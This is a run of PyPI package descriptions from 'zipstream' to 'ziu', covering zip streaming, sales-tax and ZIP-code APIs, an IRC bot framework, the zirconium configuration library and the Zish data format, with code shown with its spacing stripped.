last-minute file additionsIt's possible to generate the zip stream, but stop before finalizing it. This enables adding something like a file manifest or compression log after all the files have been added.ZipStreamprovides ainfo_listmethod that returns information on all the files added to the stream. In this example, all that information will be added to the zip in a file named "manifest.json" before finalizing it.fromzipstreamimportZipStreamimportjsondefgen_zipfile()zs=ZipStream.from_path("/path/to/files")yield fromzs.all_files()zs.add(json.dumps(zs.info_list(),indent=2),"manifest.json")yield fromzs.finalize()Comparison to stdlibSince Python 3.6 it has actually been possible to generate zip files as a stream using just the standard library, it just hasn't been very ergonomic or efficient. Consider the typical use case of zipping up a directory of files while streaming it over a network connection:(note that the size of the stream is not pre-calculated in this case as this would make the stdlib example way too long).Using ZipStream:fromzipstreamimportZipStreamsend_stream(ZipStream.from_path("/path/to/files/"))The same(ish) functionality using just the stdlib:importosimportiofromzipfileimportZipFile,ZipInfoclassStream(io.RawIOBase):"""An unseekable stream for the ZipFile to write to"""def__init__(self):self._buffer=bytearray()self._closed=Falsedefclose(self):self._closed=Truedefwrite(self,b):ifself._closed:raiseValueError("Can't write to a closed stream")self._buffer+=breturnlen(b)defreadall(self):chunk=bytes(self._buffer)self._buffer.clear()returnchunkdefiter_files(path):fordirpath,_,filesinos.walk(path,followlinks=True):ifnotfiles:yielddirpath# Preserve empty directoriesforfinfiles:yieldos.path.join(dirpath,f)defread_file(path):withopen(path,"rb")asfp:whileTrue:buf=fp.read(1024*64)ifnotbuf:breakyieldbufdefgenerate_zipstream(path):stream=Stream()withZipFile(stream,mode="w")aszf:toplevel=os.path.basename(os.path.normpath(path))forfiniter_files(path):# Use the basename of the path to set the arcnamearcname=os.path.join(toplevel,os.path.relpath(f,path))zinfo=ZipInfo.from_file(f,arcname)# Write data to the zip file then yield the stream contentwithzf.open(zinfo,mode="w")asfp:ifzinfo.is_dir():continueforbufinread_file(f):fp.write(buf)yieldstream.readall()yieldstream.readall()send_stream(generate_zipstream("/path/to/files/"))TestsThis package contains extensive tests. To run them, installpytest(pip install pytest) and runpy.testin the project directory.LicenseLicensed under theGNU LGPLv3.
ziptastic-python
Official Ziptastic Python LibraryPython library forGetZiptastic.comInstallation>>> pip install ziptastic-pythonRunning tests$ nosetestsRunning tests with coverage$ nosetests –with-coverage –cover-package=ziptasticUsageForward geocoding>>> from ziptastic import Ziptastic >>> api = Ziptastic('<your api key>') >>> result = api.get_from_postal_code('48867')Reverse geocoding>>> from ziptastic import Ziptastic >>> api = Ziptastic('<your api key>') >>> result = api.get_from_coordinates('42.9934', '-84.1595')
zip-tax
===========Zip-tax===========A client library for `Zip-Tax.com <http://www.zip-tax.com>`_. sales tax `API <http://docs.zip-tax.com/en/latest>`_.Typical usage::#!/usr/bin/env pythonimport ziptaxZIPTAX_API_KEY = 'XXXXXXXX'ztax = ziptax.ZipTax(ZIPTAX_API_KEY)# Returns data for postalcode: 12345data = ztax.get(12345)# Printing the the various fieldsprint 'Version:', data.versionprint 'rCode', data.rCodefor i in data.results:print i.geoPostalCodeprint i.geoCityprint i.geoCountyprint i.geoStateprint i.taxSalesprint i.taxUseprint i.txbServiceprint i.txbFreightprint i.stateSalesTaxprint i.stateUseTaxprint i.citySalesTaxprint i.cityUseTaxprint i.cityTaxCodeprint i.countySalesTaxprint i.countyUseTaxprint i.countyTaxCodeprint i.districtSalesTaxprint i.districtUseTaxInstallation============**Automatic installation**::pip install ziptaxZip-tax is listed in PyPI and can be installed with pip or easy_install.**Manual installation**: Download the latest source from `PyPI<http://pypi.python.org/pypi/ziptax>`_... parsed-literal::tar xvzf ziptax-$VERSION.tar.gzcd ziptax-$VERSIONpython setup.py buildsudo python setup.py installThe Zip-tax source code is `hosted on GitHub <>`_.TODO====* Write tests* Validate input parameters* Handle empty results.
ziptests
UNKNOWN
ziptool
ZIPtoolThis tool is designed to analyze microdata from the American Community Survey (ACS) on a ZIP-code level. The Census Bureau publishes microdata only on a Public Use Microdata Area (PUMA) basis, so this package converts ZIP to PUMA and returns the relevant data as either summary statistics or the raw data.RequirementsThis project requires Python 3.8.0 or higher. Install using:Getting StartedYou can find the project's documentationhere.DevelopmentThis project is in the early stages of development, so please [email protected] any problems you encounter.
ziptz
===========ziptz===========
zipvehicle
No description available on PyPI.
zipwalk
zipwalkA very simple walker that recursively walks through nested zipfilesAboutThis project was created because I needed a way to iterate over nested zipfiles without unzipping them.InstallpipinstallzipwalkUsageIt has a similar interface toos.walk:fromzipwalkimportzipwalkforroot,zips,filesinzipwalk('tests/1.zip'):print('root:',root.filename)print('zips:',zips)print('files:',files)# output:# root: tests/1.zip# zips: {'2.zip'}# files: {'1c.txt', 'dir/d1.txt', '1b.txt', '1a.txt'}# root: 2.zip# zips: set()# files: {'2c.txt', '2b.txt', '2a.txt'}rootis anZipFileinstance opened on read mode,r. All zip files are opened usingwithcontext manager and will be closed once the generator is exhausted.You can use the zip walker like the following:frompathlibimportPathfromzipfileimportZipFilefromzipwalkimportzipwalkzipwalk(ZipFile('tests/1.zip'))zipwalk(Path('tests/1.zip'))zipwalk('tests/1.zip')
zipy
Introductionzipy is a toolbox for usual python developmentDevelopmentPrerequisiteinstall poetryBuild dev environmentcd <path-to-project> poetry install poetry env use 3.10 pre-commit install
ziqiang
ziqiangziqiang, 自强, Self-strengthening. zhiqiang, 之强, become strong.Please use zhiqiang.Please seehttps://github.com/Li-Ming-Fan/zhiqiang
zirc
Quick Startimportzirc,sslclassBot(zirc.Client):def__init__(self):self.connection=zirc.Socket(wrapper=ssl.wrap_socket)self.config=zirc.IRCConfig(host="irc.freenode.net",port=6697,nickname="zirctest",ident="bot",realname="test bot",channels=["##chat"],caps=zirc.Caps(zirc.Sasl(username="username",password="password")))self.connect(self.config)self.start()defon_privmsg(self,event,irc):irc.reply(event,"It works!")#Or alternatively:#irc.privmsg(event.target, "It works!")Bot()This library implements the IRC protocol, it’s an event-driven IRC Protocol framework.InstallationPyPisudo pip install zirc sudo pip3 install zircGithubsudo pip install git+https://github.com/itslukej/zirc.git sudo pip3 install git+https://github.com/itslukej/zirc.gitGithub will contain the latest bug fixes and improvements but sometimes also “bad quality” code.FeaturesAutomatic PING/PONG between the serverIRC Message parsingA simple set up and connection methodEasy installationEasy CTCP Set-upIPv6To use IPv6 withzirc.Socket, you can use the familysocket.AF_INET6:importsocketself.connection=zirc.Socket(family=socket.AF_INET6)ProxyInitializezirc.Socketwith argumentsocket_class:self.connection=zirc.Socket(socket_class=zirc.Proxy(host="localhost",port=1080,protocol=zirc.SOCKS5))ExamplesYou canfind examples for zIRC by me and other users on CodeBottleIdeasMultiple connection supportTODOMore documentationContributingTalk to us on #zirc at FreenodePlease discuss code changes that significantly affect client use of the library before merging to the master branch. Change the version insetup.pyahead if the change should be uploaded to PyPi.
zircolite
No description available on PyPI.
zirconium
ZirconiumZirconium is a powerful configuration tool for loading and using configuration in your application.Use CaseZirconium abstracts away the process of loading and type-coercing configuration so that it Just Works for your application. For exampleKey FeaturesFeaturesSupport for libraries to provide their own default configuration and/or configuration file locationsApplications specify their own configuration [email protected] replacement of ${ENVIRONMENT_VARIABLES} in stringsConsistent type coercion for common data types: paths, ints, floats, decimals, bytes, lists, dicts, sets, dates, timedeltas, and datetimesWhere dictionary-style declarations are not supported, instead use the dot syntax (e.g. "foo.bar")Supports multiple file encodingsExtensible to other formats as neededConfiguration is dict-like for ease-of-use in existing locations (e.g. Flask)Multiple files can be specified with different weights to control loading orderSupports default vs. normal configuration file (defaults always loaded first)Supports thread-safe injection of the configuration into your application via autoinjectSupports specifying default configuration for libraries in entry pointszirconium.configand for parsers inzirconium.parsers, as well as using [email protected] configuration methodsDatabase tables (with SQLAlchemy installed)YAML (with pyyaml installed)TOML (with toml installed or Python >= 3.11)JSONSetuptools-like CFG filesINI files (following the defaults of the configparser module)Environment variablesPriority OrderLater items in this list will override previous itemsFiles registered withregister_default_file(), in ascending order byweight(or order called)Files registered withregister_file(), in ascending order byweightFiles from environment variables registered withregister_file_from_environ(), in ascending order byweightValues from environment variables registered withregister_environ_var()Example Usageimportpathlibimportzirconiumfromautoinjectimportinjector@zirconium.configuredefadd_config(config):# Direct load configuration from dict:config.load_from_dict({"version":"0.0.1","database":{# Load these from environment variables"username":"${MYAPP_DATABASE_USERNAME}","password":"${MYAPP_DATABASE_PASSWORD}",},"escaped_environment_example":"$${NOT_AN_ENVIRONMENT VARIABLE","preceding_dollar_sign":"$$${STOCK_PRICE_ENV_VARIABLE}",})# Default configuration, relative to this file, will override the above dictbase_file=pathlib.Path(__file__).parent/".myapp.defaults.toml"config.register_default_file(base_file)# File in user home directory, overrides the defaultsconfig.register_file("~/.myapp.toml")# File in CWD, will override whatever is in homeconfig.register_file("./.myapp.toml")# Load a file path from environment variable, will override ALL registered filesconfig.register_file_from_environ("MYAPP_CONFIG_FILE")# Load values direct from the environment, will override ALL files including those specific in environment variables# sets config["database"]["password"]config.register_environ_var("MYAPP_DATABASE_PASSWORD","database","password")# sets config["database"]["username"]config.register_environ_var("MYAPP_DATABASE_USERNAME","database","username")# Injection exampleclassNeedsConfiguration:config:[email protected]__init__(self):# you have self.config available as of herepass# Method [email protected]_config(config:zirconium.ApplicationConfig=None):print(f"Hello world, my name is{config.as_str('myapp','welcome_name')}")print(f"Database user:{config.as_str('database','username')}")Type Coercion [email protected]_config(config):config.load_from_dict({"bytes_example":"5K","timedelta_example":"5m","date_example":"2023-05-05","datetime_example":"2023-05-05T17:05:05","int_example":"5","float_example":"5.55","decimal_example":"5.55","str_example":"5.55","bool_false_example":0,"bool_true_example":1,"path_example":"~/user/file","set_example":["one","one","two"],"list_example":["one","one","two"],"dict_example":{"one":1,"two":2,}})@injector.injectdefshow_examples(config:zirconium.ApplicationConfig=None):config.as_bytes("bytes_example")# 5120 (int)config.as_timedelta("timedelta_example) # datetime.timedelta(minutes=5)config.as_date("date_example")# datetime.date(2023, 5, 5)config.as_datetime("datetime_example")# datetime.datetime(2023, 5, 5, 17, 5, 5)config.as_int("int_example")# 5 (int)config.as_float("float_example")# 5.55 (float)config.as_decimal("decimal_example")# decimal.Decimal("5.55")config.as_str("str_example")# "5.55"config.as_bool("bool_false_example")# False (bool)config.as_bool("bool_true_example")# True (bool)config.as_path("path_example")# pathlib.Path("~/user/file")config.as_set("set_example")# {"one", "two"}config.as_list("list_example")# ["one", "one", "two"]config.as_dict("dict_example")# {"one": 1, "two": 2}# Raw dicts can still be used as sub-keys, for exampleconfig.as_int(("dict_example","one"))# 1 (int)Config ReferencesIn certain cases, your application might want to let the configuration be reloaded. This is possible via thereload_config()method which will reset your configuration to its base and reload all the values from the original files. However, where a value has already been used in your program, that value will need to be updated. This leads us to the ConfigRef() pattern which lets applications obtain a value and keep it current with the latest value loaded. If you do not plan on reloading your configuration on-the-fly, you can skip this section.When using the methods that end in_ref(), you will obtain an instance of_ConfigRef(). This object has a few special properties but will mostly behave as the underlying configuration value with a few exceptions:isinstancewill not work with itis Nonewill not return True even if the configuration value is actually None (use.is_none()instead)To get a raw value to work with, useraw_value().The value is cached within the_ConfigRef()object but this cache is invalidated wheneverreload_config()is called. This should reduce the work you have to do when reloading your configuration (though you may still need to call certain methods when the configuration is reloaded).To call a method on reload, you can add it viaconfig.on_load(callable). Ifcallableneeds to interact with a different thread or process than the one wherereload_config()is called, it is your responsibility to manage this communication (e.g. usethreading.Eventto notify the thread that the configuration needs to be reloaded).Testing classes that use ApplicationConfigUnit test functions decorated withautoinject.injector.test_casecan declare configuration usingzirconium.test_with_config(key, val)to declare configuration for testing. For example, this test case should pass:fromautoinjectimportinjectorimportzirconiumaszrimportunittestclassMyTestCase(unittest.TestCase):# This is essential since we use autoinject's test_case() to handle the ApplicationConfig [email protected]_case# Declare a single [email protected]_with_config(("foo","bar"),"hello world")# You can repeat the decorator to declare multiple [email protected]_with_config(("some","value"),"what")# You can also pass a dict instead of a key, value [email protected]_with_config({"foo":{"bar2":"hello world #2"}})deftest_something(self):# As a simple [email protected]_something(cfg:zr.ApplicationConfig=None):self.assertEqual(cfg.as_str(("foo","bar")),"hello world")self.assertEqual(cfg.as_str(("some","value")),"what")Note that this pattern replaces all configuration values with the ones declared in decorators, so previously loaded values will not be passed into your test function nor will they be passed between test functions.Change LogVersion 1.2.1Test cases can now use the [email protected]_with_config(key: t.Iterable, value: t.Any)to inject test configuration.Version 1.2.0Addedas_bytes()which will accept values like2Mand return the value converted into bytes (e.g.2097152. If you really want to use metric prefixes (e.g.2MB=2000000), you must passallow_metric=Trueand then specify your units as2MB. Prefixes up to exbibyte (EiB) are handled at the moment. You can also specifyBfor bytes orbitfor a number of bits. If no unit is specified, it uses thedefault_unitsparameter, which isBby default. All units are case-insensitive.Addedas_timedelta()which will accept values like30mand returndatetime.timedelta(minutes=30). Valid units ares,m,h,d,w,us, andms. If no units are specified, it defaults to thedefault_unitsparameter which issby default. All units are case-insensitive.Added a new series of methodsas_*_ref()(andget_ref()) which mirror the behaviour of their counterparts not ending in_ref()except these return a_ConfigRef()instance instead of an actual value.Added a methodprint_config()which will print out the configuration to the command line.Version 1.1.0Addedas_list()andas_set()which return as expectedType-hinting added to theas_X()methods to help with usage in your IDEAdded support forregister_files()which takes a set of directories to use and registers a set of files and default files in each.Version 1.0.0Stable release after extensive testing on my ownPython 3.11's tomllib now supported for parsing TOML filesUsingpymitterto manage configuration registration was proving problematic when called from a different thread than where the application config object was instatiated. Replaced it with a more robust solution.Fixed a bug for registering default filesAddedas_dict()to the configuration object which returns an instance ofMutableDeepDict.
zirkus
zirkusDevelopmentTo develop with this package, install it in development mode into a virtual environment:cd zirkus pip install -e .You can run the tests with:python setup.py testorpy.test
ziroom-watcher
# ziroom_watcher监视自如房源,当状态更新时获得邮件更新## 安装`pip install ziroom_watcher`## 用法```pyfrom ziroom_watcher import Watcherwatcher = Watcher('http://www.ziroom.com/z/vr/1234567.html')watcher.config({'username': '*****@qq.com','password': '********',})watcher.watch()```
zirpu-utils
Mostly this is a package for Zirpu to build his default working virtualenv and some utility scripts.See the requirements.txt for the list of packages installed.decimal_time just returns the “decimal” time version of the unix timestamp split intoyear:month:week:day hour:minutes:seconds
zisan
No description available on PyPI.
zish
A Python library for theZish format, released under theMIT-0 licence.Table of ContentsInstallationQuickstartRunning The TestsREADME.rstMaking A New ReleaseRelease NotesVersion 0.1.11 (2023-10-09)Version 0.1.10 (2022-10-29)Version 0.1.9 (2021-04-05)Version 0.1.8 (2020-06-25)Version 0.1.7 (2020-02-11)Version 0.1.6 (2018-11-12)Version 0.1.5 (2018-10-30)Version 0.1.4 (2018-10-30)Version 0.1.3 (2018-10-30)Version 0.1.2 (2018-09-04)Version 0.1.1 (2018-03-13)Version 0.1.0 (2018-01-29)Version 0.0.26 (2018-01-29)Version 0.0.25 (2018-01-12)Version 0.0.24 (2018-01-11)Version 0.0.23 (2018-01-09)Version 0.0.22 (2018-01-08)Version 0.0.21 (2018-01-04)Version 0.0.20 (2018-01-04)Version 0.0.19 (2017-09-27)Version 0.0.18 (2017-09-12)Version 0.0.17 (2017-09-12)Version 0.0.16 (2017-09-06)Version 0.0.15 (2017-09-05)Version 0.0.14 (2017-09-05)Version 0.0.13 (2017-08-30)Version 0.0.12 (2017-08-30)Version 0.0.11 (2017-08-30)Version 0.0.10 (2017-08-29)Version 0.0.9 (2017-08-24)Version 0.0.8 (2017-08-24)Version 0.0.7 (2017-08-22)Version 0.0.6 (2017-08-22)Version 0.0.5 (2017-08-18)Version 0.0.4 (2017-08-15)Version 0.0.3 (2017-08-09)Version 0.0.2 (2017-08-05)Version 0.0.1 (2017-08-03)Version 0.0.0 (2017-08-01)InstallationCreate a virtual environment:python3-mvenv venvActivate the virtual environment:source venv/bin/activateInstall:pip install zishQuickstartTo go from a Python object to an Zish string usezish.dumps. To go from a Zish string to a Python object usezish.loads. Eg.>>> from zish import loads, dumps >>> from datetime import datetime, timezone >>> from decimal import Decimal >>> >>> # Take a Python object >>> book = { ... 'title': 'A Hero of Our Time', ... 'read_date': datetime(2017, 7, 16, 14, 5, tzinfo=timezone.utc), ... 'would_recommend': True, ... 'description': None, ... 'number_of_novellas': 5, ... 'price': Decimal('7.99'), ... 'weight': 6.88, ... 'key': b'kshhgrl', ... 'tags': ['russian', 'novel', '19th century']} >>> >>> # Output it as an Zish string >>> zish_str = dumps(book) >>> print(zish_str) { "description": null, "key": 'a3NoaGdybA==', "number_of_novellas": 5, "price": 7.99, "read_date": 2017-07-16T14:05:00Z, "tags": [ "russian", "novel", "19th century", ], "title": "A Hero of Our Time", "weight": 6.88, "would_recommend": true, } >>> >>> # Load the Zish string, to give us back the Python object >>> reloaded_book = loads(zish_str) >>> >>> # Print the title >>> print(reloaded_book['title']) A Hero of Our TimePython To Zish Type MappingPython TypeZish Typeboolboolintintegerstrstringdatetime.datetimetimestampdictmapdecimal.DecimaldecimalfloatdecimalbytearraybytesbytesbyteslistlisttuplelistRunning The TestsChange to thezishdirectory:cd zishCreate a virtual environment:python3-mvenv venvActivate the virtual environment:source venv/bin/activateInstall tox:pip install toxRun tox:toxREADME.rstThis file is written in thereStructuredTextformat. To generate an HTML page from it, do:Activate the virtual environment:source venv/bin/activateInstallSphinx:pip install SphinxRunrst2html.py:rst2html.py README.rst README.htmlMaking A New ReleaseRuntoxto make sure all tests pass, then update the ‘Release Notes’ section then do:git tag -a x.y.z -m "version x.y.z" rm -r dist python -m build twine upload --sign dist/*Release NotesVersion 0.1.11 (2023-10-09)Fix bug wheredump()didn’t escape"and\\properly.Remove support for Python 3.7 and add support for Python 3.11.Version 0.1.10 (2022-10-29)Switch to MIT-0 licence.Make the U+00A0 NO-BREAK SPACE character whitespaceBetter error message whendump()encounters an unrecognised type.Version 0.1.9 (2021-04-05)Allow trailing commas in maps and lists.Version 0.1.8 (2020-06-25)Makedumpssort thesettype before outputing as a list.Version 0.1.7 (2020-02-11)Use 1-based line and character numbers, rather than zero-based.Arrow time library upgraded.Line and character numbers now available in errorsVersion 0.1.6 (2018-11-12)Better error message when parsing an empty string.Version 0.1.5 (2018-10-30)Fix new Flake8 errors.Version 0.1.4 (2018-10-30)Better error message if there’s a duplicate key in a map.Version 0.1.3 (2018-10-30)An exception is thrown if there’s a duplicate key in a map.Version 0.1.2 (2018-09-04)Change formatting for map and list in dumps. The trailing } and ] are now on a line down and at the original index.Version 0.1.1 (2018-03-13)A decimal with an uppercase ‘E’ in the exponent wasn’t being recognized.Version 0.1.0 (2018-01-29)A map key can’t be null, following change in spec.Version 0.0.26 (2018-01-29)Remove ‘//’ as a comment, following change in spec.Allow ‘e’ and ‘E’ in the exponent of a decimal, following change in spec.Version 0.0.25 (2018-01-12)Better error message when the end of the document is reached without a map being closed.Version 0.0.24 (2018-01-11)Fix bug where an integer after a value (and before a ‘,’ or ‘}’) in a map doesn’t give a good error.Version 0.0.23 (2018-01-09)A map key can’t now be a list or a map.Version 0.0.22 (2018-01-08)A map key can now be of any type.The ‘set’ type has been removed from Zish.Zish now recognizes the full set of Unicode EOL sequences.The ‘float’ type has been removed from Zish.Fixed bug when sorting map with keys of more than one type.Version 0.0.21 (2018-01-04)Give a better error if the end of the document is reached before a map is completed.Version 0.0.20 (2018-01-04)Give an error if there are multiple top-level values, rather than silently truncating.Version 0.0.19 (2017-09-27)Decimal exponent dumped asErather thand.Version 0.0.18 (2017-09-12)Add tests for float formatting.Version 0.0.17 (2017-09-12)Tighten up parsing of container types.Make sure floats are formatted without an uppercase E.Version 0.0.16 (2017-09-06)Allow lists and sets as keys.Version 0.0.15 (2017-09-05)Fixed map parsing bug where an error wasn’t reported properly if it was expecting a:but got an integer.Version 0.0.14 (2017-09-05)Fixed bug where sets couldn’t be formatted.Version 0.0.13 (2017-08-30)Performance improvement.Version 0.0.12 (2017-08-30)Add Travis configuration.Version 0.0.11 (2017-08-30)Give a better error message if a string isn’t closed.Version 0.0.10 (2017-08-29)New native parser that doesn’t use antlr. It’s about twice as fast.Version 0.0.9 (2017-08-24)Fix bug whereintwas being parsed asDecimal.Make bytes type return abytesrather than abytearray.Version 0.0.8 (2017-08-24)Container types aren’t allowed as map keys.Performance improvements.Version 0.0.7 (2017-08-22)Fix bug with UTC timestamp formatting.Version 0.0.6 (2017-08-22)Fix bug in timestamp formatting.Add note about comments.Version 0.0.5 (2017-08-18)Fix bug wheredumpsfails for atuple.Version 0.0.4 (2017-08-15)Simplify integer types.Version 0.0.3 (2017-08-09)Fixed bug where interpreter couldn’t find thezish.antlrpackage in eggs.Removed a few superfluous escape sequences.Version 0.0.2 (2017-08-05)Now uses RFC3339 for timestamps.Version 0.0.1 (2017-08-03)Fix bug where an EOF could cause an infinite loop.Version 0.0.0 (2017-08-01)First public release. Passes all the tests.
zish-antlr
A Python library for theZish formatformat, released under theMIT-0 licence.Table of ContentsInstallationQuickstartContributingMaking A New ReleaseRelease NotesVersion 0.0.14 (2022-10-30)Version 0.0.13 (2021-04-04)Version 0.0.12 (2017-09-07)Version 0.0.11 (2017-09-07)Version 0.0.10 (2017-09-07)Version 0.0.9 (2017-08-24)Version 0.0.8 (2017-08-24)Version 0.0.7 (2017-08-22)Version 0.0.6 (2017-08-22)Version 0.0.5 (2017-08-18)Version 0.0.4 (2017-08-15)Version 0.0.3 (2017-08-09)Version 0.0.2 (2017-08-05)Version 0.0.1 (2017-08-03)Version 0.0.0 (2017-08-01)InstallationCreate a virtual environment:python3-mvenv venvActivate the virtual environment:source venv/bin/activateInstall:pip install zish_antlrQuickstartTo go from a Python object to an Zish string usezish.dumps. To go from a Zish string to a Python object usezish.loads. Eg.>>> from zish import loads, dumps >>> from datetime import datetime, timezone >>> from decimal import Decimal >>> >>> # Take a Python object >>> book = { ... 'title': 'A Hero of Our Time', ... 'read_date': datetime(2017, 7, 16, 14, 5, tzinfo=timezone.utc), ... 'would_recommend': True, ... 'description': None, ... 'number_of_novellas': 5, ... 'price': Decimal('7.99'), ... 'weight': 6.88, ... 'key': b'kshhgrl', ... 'tags': [ ... 'russian', ... 'novel', ... '19th century', ... ], ... } >>> >>> # Output it as an Zish string >>> zish_str = dumps(book) >>> print(zish_str) { "description": null, "key": 'a3NoaGdybA==', "number_of_novellas": 5, "price": 7.99, "read_date": 2017-07-16T14:05:00Z, "tags": [ "russian", "novel", "19th century", ], "title": "A Hero of Our Time", "weight": 6.88, "would_recommend": true, } >>> >>> # Load the Zish string, to give us back the Python object >>> reloaded_book = loads(zish_str) >>> >>> # Print the title >>> print(reloaded_book['title']) A Hero of Our TimePython To Zish Type MappingPython TypeZish Typeboolboolintintegerstrstringdatetime.datetimetimestampdictmapdecimal.DecimaldecimalfloatdecimalbytearraybytesbytesbyteslistlisttuplelistContributingUseful link:ANTLR JavaDocsTo run the tests:Change to thezish_python_antlrdirectory:cd zish_python_antlrCreate a virtual environment:python3-mvenv venvActivate the virtual environment:source venv/bin/activateInstall tox:pip install toxRun tox:toxThe core parser is created usingANTLRfrom the Zish grammar. To create the parser files, go to thezish/antlrdirectory and download the ANTLR jar and then run the following command:java-jarantlr-4.11.1-complete.jar-Dlanguage=Python3Zish.g4Making A New ReleaseRuntoxto make sure all tests passUpdate theRelease Notessection.Ensurebuildandtwineare installed:pip install wheel twineThen do:git tag -a x.y.z -m "version x.y.z" rm -r dist python -m build twine upload --sign dist/*Release NotesVersion 0.0.14 (2022-10-30)The U+00A0 NO-BREAK SPACE is now treated as whitespace.Version 0.0.13 (2021-04-04)Trailing commas in list and maps are now allowed.Version 0.0.12 (2017-09-07)Rename tozish_antlrto distinguish it fromzish.Version 0.0.11 (2017-09-07)Upload to PyPI failed for previous release.Version 0.0.10 (2017-09-07)Allow lists and sets as keys to maps.Version 0.0.9 (2017-08-24)Fix bug whereintwas being parsed asDecimal.Make bytes type return abytesrather than abytearray.Version 0.0.8 (2017-08-24)Container types aren’t allowed as map keys.Performance improvements.Version 0.0.7 (2017-08-22)Fix bug with UTC timestamp formatting.Version 0.0.6 (2017-08-22)Fix bug in timestamp formatting.Add note about comments.Version 0.0.5 (2017-08-18)Fix bug wheredumpsfails for atuple.Version 0.0.4 (2017-08-15)Simplify integer types.Version 0.0.3 (2017-08-09)Fixed bug where interpreter couldn’t find thezish.antlrpackage in eggs.Removed a few superfluous escape sequences.Version 0.0.2 (2017-08-05)Now uses RFC3339 for timestamps.Version 0.0.1 (2017-08-03)Fix bug where an EOF could cause an infinite loop.Version 0.0.0 (2017-08-01)First public release. Passes all the tests.
zisraw
No description available on PyPI.
zissou
No description available on PyPI.
zit
No description available on PyPI.
zita
No description available on PyPI.
zitan
This project is used to display ...
zither
Command-line tool to pull raw depths and alt freqs from BAM file(s) based on an existing VCF, writing output as new VCF to stdout.The official repository is at:https://github.com/umich-brcf-bioinf/ZitherQuickstartRead a single BAM file$ zither –bam examples/explicit_bam/Sample_X.bam examples/explicit_bam/input.vcf > output.vcfGiven a VCF and a BAM file, read positions in the input VCF and corresponding pileups from Sample_X.bam.Read a set of matched VCF sample names and BAM files$ zither examples/matching_names/input.vcf > output.vcfGiven a VCF and a collection of BAM files whose file names match the VCF sample names, reads positions from the input VCF and corresponding BAM pileups.Explicitly map VCF sample names to BAM files$ zither –mapping_file=examples/mapping_files/mapping_file.txt examples/mapping_files/input.vcf > output.vcfGiven a VCF, a collection of BAMs, and a file that maps sample names to BAM paths, reads positions from the input VCF and corresponding pileups from BAM files names.The mapping file is a tab-separated text file where each line has a sample name and the path to the corresponding BAM file. Paths to BAM files can be absolute or relative; relative paths are resolved relative to the directory that contains the mapping [email protected] support and questions.UM BRCF Bioinformatics CoreChangelog0.2 (9/3/2015)Adjusted tags to include total and unfiltered depth and alt freq.Added basecall quality filteringAdded depth cutoffAdded support for Python30.1 (8/6/2015)Initial ReleaseZither is written and maintained by the University of Michigan BRCF Bioinformatic Core; individual contributors include:Chris GatesDivya Kriti
ziti
No description available on PyPI.
zitncov
test Module
zitro1992-gamedev
No description available on PyPI.
ziu
ziuFile manager